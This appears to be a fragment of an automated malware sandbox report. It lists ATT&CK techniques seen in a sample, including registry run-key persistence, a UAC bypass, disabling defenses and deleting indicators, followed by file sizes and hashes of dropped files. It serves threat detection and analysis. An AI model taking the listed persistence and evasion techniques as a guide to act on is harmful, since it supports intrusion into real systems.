1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD531d9708ba76600f4fb8b93779eec56ae
SHA1eecfb2b078fb00188f9af50c6d1e402a9453b2b9
SHA2563a744d3de8f0e8830ad1d9ec024452188fe9e9c8e7df83e5c07f00c4fdbe3172
SHA512f203460ca4c1ed4d61aabd98f5c4fb33ffce8c288031cc8f7db17030ab2e03da729ffe4c821aeff855e0e837b5adbf86efcb27a668750635d64bcfde1f1f86aa
-
Filesize
12KB
MD59311fa594d171e35b329d82499324732
SHA152df916fd329526f3277e573a0d51b3709f19ef8
SHA25608507598d356d0ea1d858d2cd40c1b807bba0319584541aa70ff9f372b735d9b
SHA51253ce2ac099b9846dfe583baa9a7e66161ae6f05c1e4763c7cd07ede2a1726a78a6ae30aaab4cedfff024684ad2459206c8412749022fbfe9064626a38b4a6959
-
Filesize
684B
MD5e806ad6778b83da28848c075616796a8
SHA15f8c18803b770369cdc68e0070f49e35b47197bb
SHA256523b4ab2201fa40b2ea6f9dfc601cc4d553e7dbd90e45a387cf13ad2df33c17d
SHA512dd7000b3773ad55baa337a3d239b94548af786a4f4305a54eb923e9d6967bfccca24527470d2401c20c44ab4c59319b3c6555468f89c18b195897d1b0bc0c6b1